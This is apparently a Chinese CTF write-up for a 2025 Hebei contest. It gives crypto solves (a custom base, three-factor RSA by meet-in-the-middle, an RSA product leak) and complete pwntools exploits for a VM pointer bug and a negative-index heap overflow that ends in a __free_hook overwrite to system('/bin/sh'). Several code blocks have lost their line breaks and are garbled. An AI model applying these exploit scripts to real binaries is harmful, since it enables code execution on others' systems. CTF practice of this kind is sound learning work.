[冀信2025]雄

刚回来，拿到附件，作了几个。

感觉题来是可以吐槽的。小赛都那样。

Crypto

层层叠叠

给了一段密文，猜就是base

#m,n2W>w$Q&oD%Eikwf#<6+QC2Tc3vmfXP8mJ).Q$r%gDixiknrF:%u#N1$C.`@zb=G,J).9pQ&QzhESnvr)=9_RvaU&&=kRU!XbgT>o$!4H)V.ck;q*:koCk?Sr3?mMmjMJ2G[HT$1/4Hy0oU2T.8_pvaU?x@^je!XoJ(.2S8!)/Ebdk9J#<#_DZc%P3z]eqK#,Jw;_oQ&r!]xRn*fT.ux3NE

但是base几呢，拿到别人的WP，是91，然后是62，但很明显这个62并不是base62在 https://www.wqtool.com/basecode 这个网站上的解法与从不同，显然不是base62字把16进制后的串分奇偶位作了个码表替换。大体写下解法吧。如果没用过这个网站一定猜不出来怎么解。

#hex后，第1字节用k*4从码表中取,第2字节用码表k*4+1分别表示0-15，码表0-9a-zA-Z
encode = lambda x:''.join(['048cgkoswAEIMQUY'[i>>4]+'159dhlptxBFJNRVZ'[i&15] for i in x.encode()])
decode = lambda x:bytes(['048cgkoswAEIMQUY'.index(x[i])*16+'159dhlptxBFJNRVZ'.index(x[i+1]) for i in range(0,len(x),2)])

后边厨子就能自动了。

*加密的压缩包

应该放misc吧，爆破6字节crc

3因子RSA

一个大题了。晚上看来不出数，爆破到12点都不对，早上一看原来这里的c=pow(m,d,n)这里e,d是反着的，爆错了。

import sympy
import sys
import random# Random bytes
csprng = random.SystemRandom()# Least Common Multiple 
def lcm(a, b):return a*b/sympy.gcd(a,b)def get_random_prime(bits):return sympy.randprime(2**(bits-1), 2**bits)def get_ed(phi, bits):while True:e = get_random_prime(bits)        if sympy.gcd(e, phi) == 1:d = sympy.mod_inverse(e, phi)return (e, d)p = get_random_prime(256)
q = get_random_prime(256)
r = get_random_prime(256)
n = p*q*r
lamda=lcm(p-1, lcm(q-1,r-1))
(e,d) = get_ed(lamda, 48)print("Modulus:")
print ("n: ", hex(n))print("\ntest:")
m=get_random_prime(256)
c=pow(m,d,n)
w=pow(c,e,n)
print ("m: ", hex(m))
print ("c: ", hex(c))
print ("w: ", hex(w))
print(m==w)ek = (e >> 44) << 44
dk = (d >> 44) << 44
print ("ek: ", hex(ek))
print ("dk: ", hex(dk))e2 = 0x7
h=csprng.randint(1, 2**160)
flag = 'flag{' + hex(h)[2:] + '}'
a=int.from_bytes(bytes(flag,'utf-8'), byteorder='big', signed=False)
enc=pow(a, e2, n)print("\nencrypted flag via small e2:")
print ("e2: ", hex(e2))       
print ("enc: ", hex(enc))# EOF
#------------------------------------------------
n = 0x81647fb077e9b66b6a86b700f5bed99e5139dfe7484c28a5b7a27767e53266d971a19410554a127ae034440bf2f3b902e649470cdd44524cfcd2634e55d4defd7b83497d4135a05030a548730454edc18efc7a4bbd470f8bd273dbbd8a1382f7
m = 0x861011b0af95e654458f84c57d638405319ea154501df412bba722c6768c0ff9
c = 0x6ab0554ae8513a7cdfb96ba7fc2fbc5d8ab3f872746cfbf8f06660e78f402b7c3662ef896a1cde1aa9abc2a09a3590d3619941fb8621ea51d27803ff932ec43a5005f244497a4d3b254296d1c4699a4e7e8fc0e1cadd0a192905075d66a8187a
ek = 0xe00000000000
dk = 0x1211655116c24db65ea6553aecdabc06842fc485b8c89aa08e9a974d997b0842ddd142dd6712b40adff9442a4c340567568578ebdd509fb3483532f9d1e4f78d13a9a0e447935ed58bbf262bbc799c40227bcd5a5bc312531a8800000000000enc = 0x3773fd7f928a0231c0a26e48678984fc36db84f4d63de0cdb36a3101e6e48e140a21b6a6fae834dfaa2670d36444a5f002d28a5d4a9efb6822af43d4d98f4aa9a18139b76527049d2c4419d7ad4ddd9ef65ec7176842aa9ced2f8b14af7bf731
e = 7

第1步是爆破e和d，这两个都差44位用MITM中间人攻击，c=m^(dk+d1+d2) mod n 可以推出来 c*m^-dk*m^-d1 = m^d2 这样先爆破d1作个字典，再爆破d2找到相同即可。字典大约5分多钟，后边找用1分钟，还可以。

from tqdm import trange
from gmpy2 import invert 
from Crypto.Util.number import *#1,MITM 双向爆破求e,d
#c = m^(dk+d1*2^21+d2)   c*m^-dk*m^(-d1*2^21) = m^d2
#爆破d 720+21+23
ds = {}
c1 = c*invert(pow(m,dk,n),n)%n
for d1 in trange(1,1<<21):ds[c1*invert(pow(m,d1<<23,n),n)%n] = d1for d2 in trange(1<<23):v = pow(m,d2,n)if v in ds:print(ds[v],d2)break#1764685 1550449
d = dk+(1764685<<23)+1550449
#0x1211655116c24db65ea6553aecdabc06842fc485b8c89aa08e9a974d997b0842ddd142dd6712b40adff9442a4c340567568578ebdd509fb3483532f9d1e4f78d13a9a0e447935ed58bbf262bbc799c40227bcd5a5bc312531a88d76a697a871#m = c^(ek+e1*2^23+e2)   m*c^-ek*c^(-e1*2^23) = c^e2
#爆破e 4+21+23
es = {}
m1 = m*invert(pow(c,ek,n),n)%n
for e1 in trange(1,1<<21):es[m1*invert(pow(c,e1<<23,n),n)%n] = e1for e2 in trange(1,1<<23,2): #素数尾为奇数v = pow(c,e2,n)if v in es:print(es[v],e2)break#412364 1118467
e = ek+(412364<<23)+1118467
#0xe32566111103

第2步分解，由于是3个因子所以要分解两次，虽然这里的lamba与phi不同，只是phi的因子差7位，是去掉公因子的，但并不影响分解。

import random 
def e_dn(e_d,n):k=e_d-1while True:g= random.randint(2,n-1)t=kwhile True:if t%2!=0:breakt=t//2x=pow(g,t,n)if x > 1 and gcd(x-1, n) > 1:p=gcd(x-1,n)q=n//preturn p,q#先求出一个因子
p,q=e_dn(e*d,n)
#isPrime(q) 
#q = 109739797121983322771519030468092659932965062206735686070337419153070102908023
p,r=e_dn(e*d, n//q)
#p = 97924373013630812482114355821760730956021675584686065236653897693588145915951
#r = 73021559261251416915128565192581641860886519328771771653994372190887373969743

3解flag，发现q-1有因子7，所以去掉因子q，用其它两个因子求解（flag有点长，一个因子不够）。

#3, RSA e,phi有公因子
#q-1有因子7去掉后用另外两个因子求解
#gcd(7,q-1) == 7
m = pow(enc,invert(7,(p-1)*(r-1)),p*r)
long_to_bytes(m)
#flag{618b6744a7e82e58b4a510dbb43174fac42c2cdc}

*FCSR

这个实在想不解法来，等等

一个类LFSR，多了状态C和输出的折叠，给了64M的输出数据。

from random import getrandbitsbits = 80
mask = 2**bits - 1
feedback = 0xae985dff26619fc58623dc8aaf46d5903dd4254eclass Task:def __init__(self, key, iv):self.key = keyself.iv = ivself.filter = feedbackself.state = (self.iv << bits) | self.keyself.C = 0S = [0] * 20for i in range(20):self.clock()S[i] = self.F()self.state = 0for i in range(20):shift = i * 8self.state |= (S[i] << shift)self.C = 0for _ in range(162):self.clock()def clock(self):tmp = self.state & 1if tmp:fb = feedbackelse:fb = 0self.state = self.state >> 1buffer = self.state ^ self.Cself.C &= self.stateself.C ^= (buffer & fb)buffer ^= fbself.state = buffer'''|1   |[state]*| 1  |=buffer   160转8位输出|   1| 160*8'''def F(self):buffer = self.filter & self.statebuffer ^= ((buffer >> 32) & 0xffffffff)buffer ^= ((buffer >> 64) & 0xffffffff)buffer ^= ((buffer >> 96) & 0xffffffff)buffer ^= ((buffer >> 128) & 0xffffffff)buffer = buffer & 0xffffffffbuffer ^= (buffer >> 16)buffer ^= (buffer >> 8)return buffer & 0xff    def encrypt(self, msg):length = len(msg)res = b""for i in range(length):self.clock()res += bytes([self.F() ^ msg[i]])return reskey = getrandbits(bits)
iv = getrandbits(bits)
print(key)
print(iv)
ffcsr = Task(key, iv)
f = open("hint", "wb")
for i in range(2**26):ffcsr.clock()f.write((ffcsr.F().to_bytes(1, "big")))
f.close()
flag = b"flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"
f = open("flag", "wb")
enc = ffcsr.encrypt(flag)
f.write(enc)
f.close()

Product

这题都是收集来的，有点乱。这跟那个不是一个比赛。先放这吧就这一个。

from Crypto.Util.number import *
from itertools import *
from random import *
from secret import flagm = bytes_to_long(flag)
p,q = getPrime(512),getPrime(512)
n = p*q
a = randint(0,2**512)
b = randint(0,a)
c = randint(0,b)
d = randint(0,c)
e = 0x10001num = [[-a,0,a],[-b,0,b],[-c,0,c],[-d,0,d],]h = []
for _ in product(*num):total = sum(_   )result = pow(total, p, n)h.append(result)
shuffle(h)
leak = h[0:len(h)//2]
c = pow(m,e,n)print(f'leak = {leak}')
print(f'n = {n}')    
print(f"c = {c}")

这里提示给的是4个数正负排列相加后的total^p mod n的值，显然这个值是a+kp不过如果a+kp和-a+kp加一起，它会跟n相同，所以需要另找 a,b,a+b这种（不用找直接暴力一共才40个数）相加后再与n作gcd就能得到p

#a^p = a+kp
#a^p+b^p + (-a-b)^p = kp
for i in leak:for j in leak:for k in leak:p = gcd(n,i+j+k)if p != 1 and p != n:print(p)long_to_bytes(pow(c,invert(65537,p-1),p))
#DASCTF{16953d6cc3e28a7310471e213e9752ca}

PWN部分

FastMachine

由于是赛后作题没有环境，所以不保证真实情况下能通过。代码删了符号表看起来费点力，对于5小时的比赛有点不厚道了。

一个VM题，有用的是4个功能：指针向前向后 <>,输入和输出，。

明白了功能就好办了，指针在栈里向后输出libc_start_main_ret就能得到libc地址，然后给一个函数写成one就行了。

from pwn import *
context(arch='amd64', log_level='debug')elf = ELF('./chall')
libc = ELF('./libc-2.27.so')#<>,.  --,++,write,readp = process('./chall')
#gdb.attach(p, "b*0x555555400ead\nc")pay  = '>'*0x58 +'.>'*8 #leak libc
pay += '<'*(0x58+0x28) + ',>'*8 #write fun[9] = one  rsp+0x70=0
pay += '>'*0x10 + ',>'*8        
pay += '=' #call onep.sendafter(b"len> ", str(len(pay)).encode())
p.sendafter(b"code> ", pay.encode())libc.address = u64(p.recv(8))-231 - libc.sym['__libc_start_main']
print(f"{libc.address = :x}")
#gdb.attach(p, "b*0x555555400ead\nc")p.send(flat(0, libc.address+0x10a41c))p.interactive()'''
00:0000│ rsp 0x7fffffffdab0 ◂— 0xd68 /* 'h\r' */
01:0008│-0b8 0x7fffffffdab8 ◂— 0x800000008
02:0010│-0b0 0x7fffffffdac0 —▸ 0x555555a01261 ◂— 0x801040104010401
03:0018│-0a8 0x7fffffffdac8 —▸ 0x7fffffffdb40 ◂— 0
04:0020│-0a0 0x7fffffffdad0 —▸ 0x555555a01280 ◂— 0
05:0028│-098 0x7fffffffdad8 —▸ 0x555555a01260 ◂— 0x104010401040104
06:0030│-090 0x7fffffffdae0 —▸ 0x555555a01280 ◂— 0
07:0038│-088 0x7fffffffdae8 —▸ 0x555555a01260 ◂— 0x104010401040104
08:0040│-080 0x7fffffffdaf0 —▸ 0x555555400e85 ◂— sub qword ptr [rbp - 0xa8], 1     <---- 指针--
09:0048│-078 0x7fffffffdaf8 —▸ 0x555555400eaf ◂— add qword ptr [rbp - 0xa8], 1     <---- ++
0a:0050│-070 0x7fffffffdb00 —▸ 0x555555400ed8 ◂— mov rax, qword ptr [rbp - 0xa8]   <---- one_gadget求处 +0x70处为0
0b:0058│-068 0x7fffffffdb08 —▸ 0x555555400f11 ◂— mov rax, qword ptr [rbp - 0xa8]
0c:0060│-060 0x7fffffffdb10 —▸ 0x555555400f4d ◂— mov rax, qword ptr [rbp - 0xa8]    <---- 输出指针处1字节
0d:0068│-058 0x7fffffffdb18 —▸ 0x555555400f85 ◂— call 0x555555400950                <---- 读1字节到指针处
0e:0070│-050 0x7fffffffdb20 —▸ 0x555555400fb9 ◂— mov rax, qword ptr [rbp - 0xa8]
0f:0078│-048 0x7fffffffdb28 —▸ 0x555555401089 ◂— mov rax, qword ptr [rbp - 0xa8]
10:0080│-040 0x7fffffffdb30 —▸ 0x5555554010fa ◂— mov rax, qword ptr [rbp - 0x90]
11:0088│-038 0x7fffffffdb38 —▸ 0x5555554010d6 ◂— mov rax, qword ptr [rbp - 0xb0]    <---- 9 null 将来改为one
12:0090│-030 0x7fffffffdb40 ◂— 0
... ↓        3 skipped
16:00b0│-010 0x7fffffffdb60 —▸ 0x7ffff7c109a0 ◂— push rbp
17:00b8│-008 0x7fffffffdb68 ◂— 0x4338b1f13e9f0000
18:00c0│ rbp 0x7fffffffdb70 —▸ 0x7fffffffdb90 —▸ 0x555555401150 ◂— push r15
19:00c8│+008 0x7fffffffdb78 —▸ 0x55555540114b ◂— jmp 0x555555401141
1a:00d0│+010 0x7fffffffdb80 —▸ 0x7fffffffdc70 ◂— 1
1b:00d8│+018 0x7fffffffdb88 ◂— 0x4338b1f13e9f0000
1c:00e0│+020 0x7fffffffdb90 —▸ 0x555555401150 ◂— push r15
1d:00e8│+028 0x7fffffffdb98 —▸ 0x7ffff7821bf7 (__libc_start_main+231) ◂— mov edi, eax   <---- 泄露libc
'''

*mallocdelete

只有增和删，没找到漏洞

Overflow

很标准的菜单题。

在add时可输入index这里对index无限制可以前溢出，当溢出-2时正好是14的size位置，在这里放个指针后会使14对应的长度变大，从而可以写溢出。

给了libc-2.31这个还有free_hook直接写system

from pwn import *
context(arch='amd64', log_level='debug')elf = ELF('./pwn1')
libc = ELF('./libc.so.6') #2.31-0u9.2def add(idx,size):p.sendlineafter(b">> ", b'1')p.sendlineafter(b"idx: ", str(idx).encode())p.sendlineafter(b"size: ", str(size).encode())def free(idx):p.sendlineafter(b">> ", b'2')p.sendlineafter(b"idx: ", str(idx).encode())def edit(idx,msg):p.sendlineafter(b">> ", b'3')p.sendlineafter(b"idx: ", str(idx).encode())p.sendafter(b"content: ", msg)def show(idx):p.sendlineafter(b">> ", b'4')p.sendlineafter(b"idx: ", str(idx).encode())p = process('./pwn1')add(14,0)
add(0,0x400)
add(1,0x30)
add(2,0x18)
add(-2,8)   #ptr[-2] = size[14]edit(14, b'\0'*0x18+p64(0x451))
free(0)edit(14, b'A'*0x20)
show(14)
p.recvuntil(b'A'*0x20)libc.address = u64(p.recv(6)+b'\0\0') - 0x1ebbe0
print(f"{libc.address = :x}")
edit(14, b'\0'*0x18+p64(0x451))add(3,0x50)
add(4,0x50)
free(4)
free(3)
edit(14, flat(0,0,0,0x61,libc.sym['__free_hook']))
add(3,0x50)
add(4,0x50)
edit(3,b'/bin/sh\0')
edit(4, p64(libc.sym['system']))
#gdb.attach(p)
free(3)
p.interactive()

*SimpleDecoder

ARM题不会。先是个类base64然后有溢出。